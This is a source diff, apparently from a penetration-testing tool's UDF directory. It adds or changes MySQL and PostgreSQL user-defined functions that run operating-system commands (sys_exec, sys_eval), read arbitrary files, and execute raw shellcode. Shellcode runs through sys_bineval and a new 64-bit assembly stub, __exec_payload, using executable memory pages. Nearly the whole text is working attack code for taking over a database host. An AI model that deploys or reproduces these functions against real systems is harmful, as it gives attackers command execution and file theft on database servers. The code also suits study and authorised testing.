/**
|
||||
* sys_exec
|
||||
*
|
||||
* executes the argument commandstring and returns its exit status.
|
||||
* Beware that this can be a security hazard.
|
||||
*/
|
||||
DLLEXP
|
||||
my_bool sys_exec_init(
|
||||
UDF_INIT *initid
|
||||
, UDF_ARGS *args
|
||||
, char *message
|
||||
);
|
||||
|
||||
DLLEXP
|
||||
void sys_exec_deinit(
|
||||
UDF_INIT *initid
|
||||
);
|
||||
|
||||
DLLEXP
|
||||
my_ulonglong sys_exec(
|
||||
UDF_INIT *initid
|
||||
, UDF_ARGS *args
|
||||
, char *is_null
|
||||
, char *error
|
||||
);
|
||||
|
||||
/**
|
||||
* sys_eval
|
||||
*
|
||||
* executes the argument commandstring and returns its standard output.
|
||||
* Beware that this can be a security hazard.
|
||||
*/
|
||||
DLLEXP
|
||||
my_bool sys_eval_init(
|
||||
UDF_INIT *initid
|
||||
, UDF_ARGS *args
|
||||
, char *message
|
||||
);
|
||||
|
||||
DLLEXP
|
||||
void sys_eval_deinit(
|
||||
UDF_INIT *initid
|
||||
);
|
||||
|
||||
DLLEXP
|
||||
char* sys_eval(
|
||||
UDF_INIT *initid
|
||||
, UDF_ARGS *args
|
||||
, char* result
|
||||
, unsigned long* length
|
||||
, char *is_null
|
||||
, char *error
|
||||
);
|
||||
|
||||
/**
|
||||
* sys_bineval
|
||||
*
|
||||
* executes bynary opcodes.
|
||||
* Beware that this can be a security hazard.
|
||||
*/
|
||||
DLLEXP
|
||||
my_bool sys_bineval_init(
|
||||
UDF_INIT *initid
|
||||
, UDF_ARGS *args
|
||||
);
|
||||
|
||||
DLLEXP
|
||||
void sys_bineval_deinit(
|
||||
UDF_INIT *initid
|
||||
);
|
||||
|
||||
DLLEXP
|
||||
int sys_bineval(
|
||||
UDF_INIT *initid
|
||||
, UDF_ARGS *args
|
||||
);
|
||||
|
||||
#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
|
||||
DWORD WINAPI exec_payload(LPVOID lpParameter);
|
||||
#endif
|
||||
|
||||
|
||||
#ifdef __cplusplus
|
||||
}
|
||||
#endif
|
||||
|
||||
/**
|
||||
* lib_mysqludf_sys_info
|
||||
*/
|
||||
my_bool lib_mysqludf_sys_info_init(
|
||||
UDF_INIT *initid
|
||||
, UDF_ARGS *args
|
||||
, char *message
|
||||
){
|
||||
my_bool status;
|
||||
if(args->arg_count!=0){
|
||||
strcpy(
|
||||
message
|
||||
, "No arguments allowed (udf: lib_mysqludf_sys_info)"
|
||||
);
|
||||
status = 1;
|
||||
} else {
|
||||
status = 0;
|
||||
}
|
||||
return status;
|
||||
}
|
||||
|
||||
void lib_mysqludf_sys_info_deinit(
|
||||
UDF_INIT *initid
|
||||
){
|
||||
}
|
||||
|
||||
char* lib_mysqludf_sys_info(
|
||||
UDF_INIT *initid
|
||||
, UDF_ARGS *args
|
||||
, char* result
|
||||
, unsigned long* length
|
||||
, char *is_null
|
||||
, char *error
|
||||
){
|
||||
strcpy(result,LIBVERSION);
|
||||
*length = strlen(LIBVERSION);
|
||||
return result;
|
||||
}
|
||||
|
||||
my_bool sys_get_init(
|
||||
UDF_INIT *initid
|
||||
, UDF_ARGS *args
|
||||
, char *message
|
||||
){
|
||||
if(args->arg_count==1
|
||||
&& args->arg_type[0]==STRING_RESULT){
|
||||
initid->maybe_null = 1;
|
||||
return 0;
|
||||
} else {
|
||||
strcpy(
|
||||
message
|
||||
, "Expected exactly one string type parameter"
|
||||
);
|
||||
return 1;
|
||||
}
|
||||
}
|
||||
|
||||
void sys_get_deinit(
|
||||
UDF_INIT *initid
|
||||
){
|
||||
}
|
||||
|
||||
char* sys_get(
|
||||
UDF_INIT *initid
|
||||
, UDF_ARGS *args
|
||||
, char* result
|
||||
, unsigned long* length
|
||||
, char *is_null
|
||||
, char *error
|
||||
){
|
||||
char* value = getenv(args->args[0]);
|
||||
if(value == NULL){
|
||||
*is_null = 1;
|
||||
} else {
|
||||
*length = strlen(value);
|
||||
}
|
||||
return value;
|
||||
}
|
||||
|
||||
my_bool sys_set_init(
|
||||
UDF_INIT *initid
|
||||
, UDF_ARGS *args
|
||||
, char *message
|
||||
){
|
||||
if(args->arg_count!=2){
|
||||
strcpy(
|
||||
message
|
||||
, "Expected exactly two arguments"
|
||||
);
|
||||
return 1;
|
||||
}
|
||||
if(args->arg_type[0]!=STRING_RESULT){
|
||||
strcpy(
|
||||
message
|
||||
, "Expected string type for name parameter"
|
||||
);
|
||||
return 1;
|
||||
}
|
||||
args->arg_type[1]=STRING_RESULT;
|
||||
if((initid->ptr=malloc(
|
||||
args->lengths[0]
|
||||
+ 1
|
||||
+ args->lengths[1]
|
||||
+ 1
|
||||
))==NULL){
|
||||
strcpy(
|
||||
message
|
||||
, "Could not allocate memory"
|
||||
);
|
||||
return 1;
|
||||
}
|
||||
return 0;
|
||||
}
|
||||
|
||||
void sys_set_deinit(
|
||||
UDF_INIT *initid
|
||||
){
|
||||
if (initid->ptr!=NULL){
|
||||
free(initid->ptr);
|
||||
}
|
||||
}
|
||||
|
||||
long long sys_set(
|
||||
UDF_INIT *initid
|
||||
, UDF_ARGS *args
|
||||
, char *is_null
|
||||
, char *error
|
||||
){
|
||||
char *name = initid->ptr;
|
||||
char *value = name + args->lengths[0] + 1;
|
||||
memcpy(
|
||||
name
|
||||
, args->args[0]
|
||||
, args->lengths[0]
|
||||
);
|
||||
*(name + args->lengths[0]) = '\0';
|
||||
memcpy(
|
||||
value
|
||||
, args->args[1]
|
||||
, args->lengths[1]
|
||||
);
|
||||
*(value + args->lengths[1]) = '\0';
|
||||
return SETENV(name,value);
|
||||
}
|
||||
|
||||
my_bool sys_exec_init(
|
||||
UDF_INIT *initid
|
||||
, UDF_ARGS *args
|
||||
, char *message
|
||||
){
|
||||
unsigned int i=0;
|
||||
if(args->arg_count == 1
|
||||
&& args->arg_type[i]==STRING_RESULT){
|
||||
return 0;
|
||||
} else {
|
||||
strcpy(
|
||||
message
|
||||
, "Expected exactly one string type parameter"
|
||||
);
|
||||
return 1;
|
||||
}
|
||||
}
|
||||
|
||||
void sys_exec_deinit(
|
||||
UDF_INIT *initid
|
||||
){
|
||||
}
|
||||
|
||||
my_ulonglong sys_exec(
|
||||
UDF_INIT *initid
|
||||
, UDF_ARGS *args
|
||||
, char *is_null
|
||||
, char *error
|
||||
){
|
||||
return system(args->args[0]);
|
||||
}
|
||||
|
||||
my_bool sys_eval_init(
|
||||
UDF_INIT *initid
|
||||
, UDF_ARGS *args
|
||||
, char *message
|
||||
){
|
||||
unsigned int i=0;
|
||||
if(args->arg_count == 1
|
||||
&& args->arg_type[i]==STRING_RESULT){
|
||||
return 0;
|
||||
} else {
|
||||
strcpy(
|
||||
message
|
||||
, "Expected exactly one string type parameter"
|
||||
);
|
||||
return 1;
|
||||
}
|
||||
}
|
||||
|
||||
void sys_eval_deinit(
|
||||
UDF_INIT *initid
|
||||
){
|
||||
}
|
||||
|
||||
char* sys_eval(
|
||||
UDF_INIT *initid
|
||||
, UDF_ARGS *args
|
||||
, char* result
|
||||
, unsigned long* length
|
||||
, char *is_null
|
||||
, char *error
|
||||
){
|
||||
FILE *pipe;
|
||||
char line[1024];
|
||||
unsigned long outlen, linelen;
|
||||
|
||||
result = malloc(1);
|
||||
outlen = 0;
|
||||
|
||||
pipe = popen(args->args[0], "r");
|
||||
|
||||
while (fgets(line, sizeof(line), pipe) != NULL) {
|
||||
linelen = strlen(line);
|
||||
result = realloc(result, outlen + linelen);
|
||||
strncpy(result + outlen, line, linelen);
|
||||
outlen = outlen + linelen;
|
||||
}
|
||||
|
||||
pclose(pipe);
|
||||
|
||||
if (!(*result) || result == NULL) {
|
||||
*is_null = 1;
|
||||
} else {
|
||||
result[outlen-1] = 0x00;
|
||||
*length = strlen(result);
|
||||
}
|
||||
|
||||
return result;
|
||||
}
|
||||
|
||||
my_bool sys_bineval_init(
|
||||
UDF_INIT *initid
|
||||
, UDF_ARGS *args
|
||||
){
|
||||
return 0;
|
||||
}
|
||||
|
||||
void sys_bineval_deinit(
|
||||
UDF_INIT *initid
|
||||
){
|
||||
|
||||
}
|
||||
|
||||
int sys_bineval(
|
||||
UDF_INIT *initid
|
||||
, UDF_ARGS *args
|
||||
){
|
||||
size_t len;
|
||||
|
||||
#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
|
||||
int pID;
|
||||
char *code;
|
||||
#else
|
||||
int *addr;
|
||||
size_t page_size;
|
||||
pid_t pID;
|
||||
#endif
|
||||
|
||||
len = (size_t)strlen(args->args[0]);
|
||||
|
||||
#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
|
||||
// allocate a +rwx memory page
|
||||
code = (char *) VirtualAlloc(NULL, len+1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
strncpy(code, args->args[0], len);
|
||||
|
||||
WaitForSingleObject(CreateThread(NULL, 0, exec_payload, code, 0, &pID), INFINITE);
|
||||
#else
|
||||
pID = fork();
|
||||
if(pID<0)
|
||||
return 1;
|
||||
|
||||
if(pID==0)
|
||||
{
|
||||
page_size = (size_t)sysconf(_SC_PAGESIZE)-1; // get page size
|
||||
page_size = (len+page_size) & ~(page_size); // align to page boundary
|
||||
|
||||
// mmap an rwx memory page
|
||||
addr = mmap(0, page_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANONYMOUS, 0, 0);
|
||||
|
||||
if (addr == MAP_FAILED)
|
||||
return 1;
|
||||
|
||||
strncpy((char *)addr, args->args[0], len);
|
||||
|
||||
((void (*)(void))addr)();
|
||||
}
|
||||
|
||||
if(pID>0)
|
||||
waitpid(pID, 0, WNOHANG);
|
||||
#endif
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
#if defined(_WIN64)
|
||||
void __exec_payload(LPVOID);
|
||||
|
||||
DWORD WINAPI exec_payload(LPVOID lpParameter)
|
||||
{
|
||||
__try
|
||||
{
|
||||
__exec_payload(lpParameter);
|
||||
}
|
||||
__except(EXCEPTION_EXECUTE_HANDLER)
|
||||
{
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
#elif defined(_WIN32) || defined(__WIN32__) || defined(WIN32)
|
||||
DWORD WINAPI exec_payload(LPVOID lpParameter)
|
||||
{
|
||||
__try
|
||||
{
|
||||
__asm
|
||||
{
|
||||
mov eax, [lpParameter]
|
||||
call eax
|
||||
}
|
||||
}
|
||||
__except(EXCEPTION_EXECUTE_HANDLER)
|
||||
{
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
#endif
|
||||
|
||||
#endif /* HAVE_DLOPEN */
|
|
@ -46,6 +46,33 @@ DWORD WINAPI exec_payload(LPVOID lpParameter);
|
|||
PG_MODULE_MAGIC;
|
||||
#endif
|
||||
|
||||
char *text_ptr_to_char_ptr(text *arg)
|
||||
{
|
||||
char *retVal;
|
||||
int arg_size = VARSIZE(arg) - VARHDRSZ;
|
||||
retVal = (char *)malloc(arg_size + 1);
|
||||
|
||||
memcpy(retVal, VARDATA(arg), arg_size);
|
||||
retVal[arg_size] = '\0';
|
||||
|
||||
return retVal;
|
||||
}
|
||||
|
||||
text *chr_ptr_to_text_ptr(char *arg)
|
||||
{
|
||||
text *retVal;
|
||||
|
||||
retVal = (text *)malloc(VARHDRSZ + strlen(arg));
|
||||
#ifdef SET_VARSIZE
|
||||
SET_VARSIZE(retVal, VARHDRSZ + strlen(arg));
|
||||
#else
|
||||
VARATT_SIZEP(retVal) = strlen(arg) + VARHDRSZ;
|
||||
#endif
|
||||
memcpy(VARDATA(retVal), arg, strlen(arg));
|
||||
|
||||
return retVal;
|
||||
}
|
||||
|
||||
PG_FUNCTION_INFO_V1(sys_exec);
|
||||
#ifdef PGDLLIMPORT
|
||||
extern PGDLLIMPORT Datum sys_exec(PG_FUNCTION_ARGS) {
|
||||
|
@ -53,15 +80,10 @@ extern PGDLLIMPORT Datum sys_exec(PG_FUNCTION_ARGS) {
|
|||
extern DLLIMPORT Datum sys_exec(PG_FUNCTION_ARGS) {
|
||||
#endif
|
||||
text *argv0 = PG_GETARG_TEXT_P(0);
|
||||
int32 argv0_size;
|
||||
int32 result = 0;
|
||||
char *command;
|
||||
|
||||
argv0_size = VARSIZE(argv0) - VARHDRSZ;
|
||||
command = (char *)malloc(argv0_size + 1);
|
||||
|
||||
memcpy(command, VARDATA(argv0), argv0_size);
|
||||
command[argv0_size] = '\0';
|
||||
command = text_ptr_to_char_ptr(argv0);
|
||||
|
||||
/*
|
||||
Only if you want to log
|
||||
|
@ -83,18 +105,13 @@ extern DLLIMPORT Datum sys_eval(PG_FUNCTION_ARGS) {
|
|||
#endif
|
||||
text *argv0 = PG_GETARG_TEXT_P(0);
|
||||
text *result_text;
|
||||
int32 argv0_size;
|
||||
char *command;
|
||||
char *result;
|
||||
FILE *pipe;
|
||||
char line[1024];
|
||||
int32 outlen, linelen;
|
||||
|
||||
argv0_size = VARSIZE(argv0) - VARHDRSZ;
|
||||
command = (char *)malloc(argv0_size + 1);
|
||||
|
||||
memcpy(command, VARDATA(argv0), argv0_size);
|
||||
command[argv0_size] = '\0';
|
||||
command = text_ptr_to_char_ptr(argv0);
|
||||
|
||||
/*
|
||||
Only if you want to log
|
||||
|
@ -119,13 +136,7 @@ extern DLLIMPORT Datum sys_eval(PG_FUNCTION_ARGS) {
|
|||
result[outlen-1] = 0x00;
|
||||
}
|
||||
|
||||
result_text = (text *)malloc(VARHDRSZ + strlen(result));
|
||||
#ifdef SET_VARSIZE
|
||||
SET_VARSIZE(result_text, VARHDRSZ + strlen(result));
|
||||
#else
|
||||
VARATT_SIZEP(result_text) = strlen(result) + VARHDRSZ;
|
||||
#endif
|
||||
memcpy(VARDATA(result_text), result, strlen(result));
|
||||
result_text = chr_ptr_to_text_ptr(result);
|
||||
|
||||
PG_RETURN_POINTER(result_text);
|
||||
}
|
||||
|
@ -216,7 +227,6 @@ extern DLLIMPORT Datum sys_fileread(PG_FUNCTION_ARGS) {
|
|||
#endif
|
||||
text *argv0 = PG_GETARG_TEXT_P(0);
|
||||
text *result_text;
|
||||
int32 argv0_size;
|
||||
int32 len;
|
||||
int32 i, j;
|
||||
char *filename;
|
||||
|
@ -225,11 +235,7 @@ extern DLLIMPORT Datum sys_fileread(PG_FUNCTION_ARGS) {
|
|||
char table[] = "0123456789ABCDEF";
|
||||
FILE *file;
|
||||
|
||||
argv0_size = VARSIZE(argv0) - VARHDRSZ;
|
||||
filename = (char *)malloc(argv0_size + 1);
|
||||
|
||||
memcpy(filename, VARDATA(argv0), argv0_size);
|
||||
filename[argv0_size] = '\0';
|
||||
filename = text_ptr_to_char_ptr(argv0);
|
||||
|
||||
file = fopen(filename, "rb");
|
||||
if (!file)
|
||||
|
@ -258,13 +264,7 @@ extern DLLIMPORT Datum sys_fileread(PG_FUNCTION_ARGS) {
|
|||
}
|
||||
result[j] = '\0';
|
||||
|
||||
result_text = (text *)malloc(VARHDRSZ + strlen(result));
|
||||
#ifdef SET_VARSIZE
|
||||
SET_VARSIZE(result_text, VARHDRSZ + strlen(result));
|
||||
#else
|
||||
VARATT_SIZEP(result_text) = strlen(result) + VARHDRSZ;
|
||||
#endif
|
||||
memcpy(VARDATA(result_text), result, strlen(result));
|
||||
result_text = chr_ptr_to_text_ptr(result);
|
||||
|
||||
free(result);
|
||||
free(buffer);
|
BIN
extra/udfhack/windows/lib_mysqludf_sys/lib_mysqludf_sys.sln → extra/udfhack/windows/64/lib_mysqludf_sys/lib_mysqludf_sys.sln
Executable file → Normal file
BIN
extra/udfhack/windows/lib_mysqludf_sys/lib_mysqludf_sys.sln → extra/udfhack/windows/64/lib_mysqludf_sys/lib_mysqludf_sys.sln
Executable file → Normal file
Binary file not shown.
|
@ -0,0 +1,7 @@
|
|||
.CODE
|
||||
__exec_payload PROC x:QWORD
|
||||
mov rax, x
|
||||
call QWORD PTR[rax]
|
||||
ret
|
||||
__exec_payload ENDP
|
||||
END
|
|
@ -0,0 +1,564 @@
|
|||
/*
|
||||
lib_mysqludf_sys - a library with miscellaneous (operating) system level functions
|
||||
Copyright (C) 2007 Roland Bouman
|
||||
Copyright (C) 2008-2010 Roland Bouman and Bernardo Damele A. G.
|
||||
web: http://www.mysqludf.org/
|
||||
email: mysqludfs@gmail.com, bernardo.damele@gmail.com
|
||||
|
||||
This library is free software; you can redistribute it and/or
|
||||
modify it under the terms of the GNU Lesser General Public
|
||||
License as published by the Free Software Foundation; either
|
||||
version 2.1 of the License, or (at your option) any later version.
|
||||
|
||||
This library is distributed in the hope that it will be useful,
|
||||
but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||
Lesser General Public License for more details.
|
||||
|
||||
You should have received a copy of the GNU Lesser General Public
|
||||
License along with this library; if not, write to the Free Software
|
||||
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
|
||||
*/
|
||||
|
||||
#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
|
||||
#define DLLEXP __declspec(dllexport)
|
||||
#else
|
||||
#define DLLEXP
|
||||
#include <sys/types.h>
|
||||
#include <sys/wait.h>
|
||||
#include <unistd.h>
|
||||
#endif
|
||||
|
||||
#ifdef STANDARD
|
||||
#include <string.h>
|
||||
#include <stdlib.h>
|
||||
#include <time.h>
|
||||
#ifdef __WIN__
|
||||
typedef unsigned __int64 ulonglong;
|
||||
typedef __int64 longlong;
|
||||
#else
|
||||
typedef unsigned long long ulonglong;
|
||||
typedef long long longlong;
|
||||
#endif /*__WIN__*/
|
||||
#else
|
||||
#include <my_global.h>
|
||||
#include <my_sys.h>
|
||||
#endif
|
||||
#include <mysql.h>
|
||||
#include <m_ctype.h>
|
||||
#include <m_string.h>
|
||||
#include <stdlib.h>
|
||||
|
||||
#include <ctype.h>
|
||||
|
||||
#ifdef HAVE_DLOPEN
|
||||
#ifdef __cplusplus
|
||||
extern "C" {
|
||||
#endif
|
||||
|
||||
#define LIBVERSION "lib_mysqludf_sys version 0.0.3"
|
||||
|
||||
#ifdef __WIN__
|
||||
#define SETENV(name,value) SetEnvironmentVariable(name,value);
|
||||
#else
|
||||
#define SETENV(name,value) setenv(name,value,1);
|
||||
#endif
|
||||
|
||||
DLLEXP
|
||||
my_bool lib_mysqludf_sys_info_init(
|
||||
UDF_INIT *initid
|
||||
, UDF_ARGS *args
|
||||
, char *message
|
||||
);
|
||||
|
||||
DLLEXP
|
||||
void lib_mysqludf_sys_info_deinit(
|
||||
UDF_INIT *initid
|
||||
);
|
||||
|
||||
DLLEXP
|
||||
char* lib_mysqludf_sys_info(
|
||||
UDF_INIT *initid
|
||||
, UDF_ARGS *args
|
||||
, char* result
|
||||
, unsigned long* length
|
||||
, char *is_null
|
||||
, char *error
|
||||
);
|
||||
|
||||
/**
|
||||
* sys_get
|
||||
*
|
||||
* Gets the value of the specified environment variable.
|
||||
*/
|
||||
DLLEXP
|
||||
my_bool sys_get_init(
|
||||
UDF_INIT *initid
|
||||
, UDF_ARGS *args
|
||||
, char *message
|
||||
);
|
||||
|
||||
DLLEXP
|
||||
void sys_get_deinit(
|
||||
UDF_INIT *initid
|
||||
);
|
||||
|
||||
DLLEXP
|
||||
char* sys_get(
|
||||
UDF_INIT *initid
|
||||
, UDF_ARGS *args
|
||||
, char* result
|
||||
, unsigned long* length
|
||||
, char *is_null
|
||||
, char *error
|
||||
);
|
||||
|
||||
/**
|
||||
* sys_set
|
||||
*
|
||||
* Sets the value of the environment variables.
|
||||
* This function accepts a set of name/value pairs
|
||||
* which are then set as environment variables.
|
||||
* Use sys_get to retrieve the value of such a variable
|
||||
*/
|
||||
DLLEXP
|
||||
my_bool sys_set_init(
|
||||
UDF_INIT *initid
|
||||
, UDF_ARGS *args
|
||||
, char *message
|
||||
);
|
||||
|
||||
DLLEXP
|
||||
void sys_set_deinit(
|
||||
UDF_INIT *initid
|
||||
);
|
||||
|
||||
DLLEXP
|
||||
long long sys_set(
|
||||
UDF_INIT *initid
|
||||
, UDF_ARGS *args
|
||||
, char *is_null
|
||||
, char *error
|
||||
);
|
||||
|
||||
/**
|
||||
* sys_exec
|
||||
*
|
||||
* executes the argument commandstring and returns its exit status.
|
||||
* Beware that this can be a security hazard.
|
||||
*/
|
||||
DLLEXP
|
||||
my_bool sys_exec_init(
|
||||
UDF_INIT *initid
|
||||
, UDF_ARGS *args
|
||||
, char *message
|
||||
);
|
||||
|
||||
DLLEXP
|
||||
void sys_exec_deinit(
|
||||
UDF_INIT *initid
|
||||
);
|
||||
|
||||
DLLEXP
|
||||
my_ulonglong sys_exec(
|
||||
UDF_INIT *initid
|
||||
, UDF_ARGS *args
|
||||
, char *is_null
|
||||
, char *error
|
||||
);
|
||||
|
||||
/**
|
||||
* sys_eval
|
||||
*
|
||||
* executes the argument commandstring and returns its standard output.
|
||||
* Beware that this can be a security hazard.
|
||||
*/
|
||||
DLLEXP
|
||||
my_bool sys_eval_init(
|
||||
UDF_INIT *initid
|
||||
, UDF_ARGS *args
|
||||
, char *message
|
||||
);
|
||||
|
||||
DLLEXP
|
||||
void sys_eval_deinit(
|
||||
UDF_INIT *initid
|
||||
);
|
||||
|
||||
DLLEXP
|
||||
char* sys_eval(
|
||||
UDF_INIT *initid
|
||||
, UDF_ARGS *args
|
||||
, char* result
|
||||
, unsigned long* length
|
||||
, char *is_null
|
||||
, char *error
|
||||
);
|
||||
|
||||
/**
|
||||
* sys_bineval
|
||||
*
|
||||
* executes bynary opcodes.
|
||||
* Beware that this can be a security hazard.
|
||||
*/
|
||||
DLLEXP
|
||||
my_bool sys_bineval_init(
|
||||
UDF_INIT *initid
|
||||
, UDF_ARGS *args
|
||||
);
|
||||
|
||||
DLLEXP
|
||||
void sys_bineval_deinit(
|
||||
UDF_INIT *initid
|
||||
);
|
||||
|
||||
DLLEXP
|
||||
int sys_bineval(
|
||||
UDF_INIT *initid
|
||||
, UDF_ARGS *args
|
||||
);
|
||||
|
||||
#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
|
||||
DWORD WINAPI exec_payload(LPVOID lpParameter);
|
||||
#endif
|
||||
|
||||
|
||||
#ifdef __cplusplus
|
||||
}
|
||||
#endif
|
||||
|
||||
/**
|
||||
* lib_mysqludf_sys_info
|
||||
*/
|
||||
my_bool lib_mysqludf_sys_info_init(
|
||||
UDF_INIT *initid
|
||||
, UDF_ARGS *args
|
||||
, char *message
|
||||
){
|
||||
my_bool status;
|
||||
if(args->arg_count!=0){
|
||||
strcpy(
|
||||
message
|
||||
, "No arguments allowed (udf: lib_mysqludf_sys_info)"
|
||||
);
|
||||
status = 1;
|
||||
} else {
|
||||
status = 0;
|
||||
}
|
||||
return status;
|
||||
}
|
||||
|
||||
void lib_mysqludf_sys_info_deinit(
|
||||
UDF_INIT *initid
|
||||
){
|
||||
}
|
||||
|
||||
char* lib_mysqludf_sys_info(
|
||||
UDF_INIT *initid
|
||||
, UDF_ARGS *args
|
||||
, char* result
|
||||
, unsigned long* length
|
||||
, char *is_null
|
||||
, char *error
|
||||
){
|
||||
strcpy(result,LIBVERSION);
|
||||
*length = strlen(LIBVERSION);
|
||||
return result;
|
||||
}
|
||||
|
||||
my_bool sys_get_init(
|
||||
UDF_INIT *initid
|
||||
, UDF_ARGS *args
|
||||
, char *message
|
||||
){
|
||||
if(args->arg_count==1
|
||||
&& args->arg_type[0]==STRING_RESULT){
|
||||
initid->maybe_null = 1;
|
||||
return 0;
|
||||
} else {
|
||||
strcpy(
|
||||
message
|
||||
, "Expected exactly one string type parameter"
|
||||
);
|
||||
return 1;
|
||||
}
|
||||
}
|
||||
|
||||
void sys_get_deinit(
|
||||
UDF_INIT *initid
|
||||
){
|
||||
}
|
||||
|
||||
char* sys_get(
|
||||
UDF_INIT *initid
|
||||
, UDF_ARGS *args
|
||||
, char* result
|
||||
, unsigned long* length
|
||||
, char *is_null
|
||||
, char *error
|
||||
){
|
||||
char* value = getenv(args->args[0]);
|
||||
if(value == NULL){
|
||||
*is_null = 1;
|
||||
} else {
|
||||
*length = strlen(value);
|
||||
}
|
||||
return value;
|
||||
}
|
||||
|
||||
my_bool sys_set_init(
|
||||
UDF_INIT *initid
|
||||
, UDF_ARGS *args
|
||||
, char *message
|
||||
){
|
||||
if(args->arg_count!=2){
|
||||
strcpy(
|
||||
message
|
||||
, "Expected exactly two arguments"
|
||||
);
|
||||
return 1;
|
||||
}
|
||||
if(args->arg_type[0]!=STRING_RESULT){
|
||||
strcpy(
|
||||
message
|
||||
, "Expected string type for name parameter"
|
||||
);
|
||||
return 1;
|
||||
}
|
||||
args->arg_type[1]=STRING_RESULT;
|
||||
if((initid->ptr=malloc(
|
||||
args->lengths[0]
|
||||
+ 1
|
||||
+ args->lengths[1]
|
||||
+ 1
|
||||
))==NULL){
|
||||
strcpy(
|
||||
message
|
||||
, "Could not allocate memory"
|
||||
);
|
||||
return 1;
|
||||
}
|
||||
return 0;
|
||||
}
|
||||
|
||||
void sys_set_deinit(
|
||||
UDF_INIT *initid
|
||||
){
|
||||
if (initid->ptr!=NULL){
|
||||
free(initid->ptr);
|
||||
}
|
||||
}
|
||||
|
||||
long long sys_set(
|
||||
UDF_INIT *initid
|
||||
, UDF_ARGS *args
|
||||
, char *is_null
|
||||
, char *error
|
||||
){
|
||||
char *name = initid->ptr;
|
||||
char *value = name + args->lengths[0] + 1;
|
||||
memcpy(
|
||||
name
|
||||
, args->args[0]
|
||||
, args->lengths[0]
|
||||
);
|
||||
*(name + args->lengths[0]) = '\0';
|
||||
memcpy(
|
||||
value
|
||||
, args->args[1]
|
||||
, args->lengths[1]
|
||||
);
|
||||
*(value + args->lengths[1]) = '\0';
|
||||
return SETENV(name,value);
|
||||
}
|
||||
|
||||
my_bool sys_exec_init(
|
||||
UDF_INIT *initid
|
||||
, UDF_ARGS *args
|
||||
, char *message
|
||||
){
|
||||
unsigned int i=0;
|
||||
if(args->arg_count == 1
|
||||
&& args->arg_type[i]==STRING_RESULT){
|
||||
return 0;
|
||||
} else {
|
||||
strcpy(
|
||||
message
|
||||
, "Expected exactly one string type parameter"
|
||||
);
|
||||
return 1;
|
||||
}
|
||||
}
|
||||
|
||||
void sys_exec_deinit(
|
||||
UDF_INIT *initid
|
||||
){
|
||||
}
|
||||
|
||||
my_ulonglong sys_exec(
|
||||
UDF_INIT *initid
|
||||
, UDF_ARGS *args
|
||||
, char *is_null
|
||||
, char *error
|
||||
){
|
||||
return system(args->args[0]);
|
||||
}
|
||||
|
||||
my_bool sys_eval_init(
|
||||
UDF_INIT *initid
|
||||
, UDF_ARGS *args
|
||||
, char *message
|
||||
){
|
||||
unsigned int i=0;
|
||||
if(args->arg_count == 1
|
||||
&& args->arg_type[i]==STRING_RESULT){
|
||||
return 0;
|
||||
} else {
|
||||
strcpy(
|
||||
message
|
||||
, "Expected exactly one string type parameter"
|
||||
);
|
||||
return 1;
|
||||
}
|
||||
}
|
||||
|
||||
void sys_eval_deinit(
|
||||
UDF_INIT *initid
|
||||
){
|
||||
}
|
||||
|
||||
char* sys_eval(
|
||||
UDF_INIT *initid
|
||||
, UDF_ARGS *args
|
||||
, char* result
|
||||
, unsigned long* length
|
||||
, char *is_null
|
||||
, char *error
|
||||
){
|
||||
FILE *pipe;
|
||||
char line[1024];
|
||||
unsigned long outlen, linelen;
|
||||
|
||||
result = malloc(1);
|
||||
outlen = 0;
|
||||
|
||||
pipe = popen(args->args[0], "r");
|
||||
|
||||
while (fgets(line, sizeof(line), pipe) != NULL) {
|
||||
linelen = strlen(line);
|
||||
result = realloc(result, outlen + linelen);
|
||||
strncpy(result + outlen, line, linelen);
|
||||
outlen = outlen + linelen;
|
||||
}
|
||||
|
||||
pclose(pipe);
|
||||
|
||||
if (!(*result) || result == NULL) {
|
||||
*is_null = 1;
|
||||
} else {
|
||||
result[outlen-1] = 0x00;
|
||||
*length = strlen(result);
|
||||
}
|
||||
|
||||
return result;
|
||||
}
|
||||
|
||||
my_bool sys_bineval_init(
|
||||
UDF_INIT *initid
|
||||
, UDF_ARGS *args
|
||||
){
|
||||
return 0;
|
||||
}
|
||||
|
||||
void sys_bineval_deinit(
|
||||
UDF_INIT *initid
|
||||
){
|
||||
|
||||
}
|
||||
|
||||
int sys_bineval(
|
||||
UDF_INIT *initid
|
||||
, UDF_ARGS *args
|
||||
){
|
||||
size_t len;
|
||||
|
||||
#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
|
||||
int pID;
|
||||
char *code;
|
||||
#else
|
||||
int *addr;
|
||||
size_t page_size;
|
||||
pid_t pID;
|
||||
#endif
|
||||
|
||||
len = (size_t)strlen(args->args[0]);
|
||||
|
||||
#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
|
||||
// allocate a +rwx memory page
|
||||
code = (char *) VirtualAlloc(NULL, len+1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
strncpy(code, args->args[0], len);
|
||||
|
||||
WaitForSingleObject(CreateThread(NULL, 0, exec_payload, code, 0, &pID), INFINITE);
|
||||
#else
|
||||
pID = fork();
|
||||
if(pID<0)
|
||||
return 1;
|
||||
|
||||
if(pID==0)
|
||||
{
|
||||
page_size = (size_t)sysconf(_SC_PAGESIZE)-1; // get page size
|
||||
page_size = (len+page_size) & ~(page_size); // align to page boundary
|
||||
|
||||
// mmap an rwx memory page
|
||||
addr = mmap(0, page_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANONYMOUS, 0, 0);
|
||||
|
||||
if (addr == MAP_FAILED)
|
||||
return 1;
|
||||
|
||||
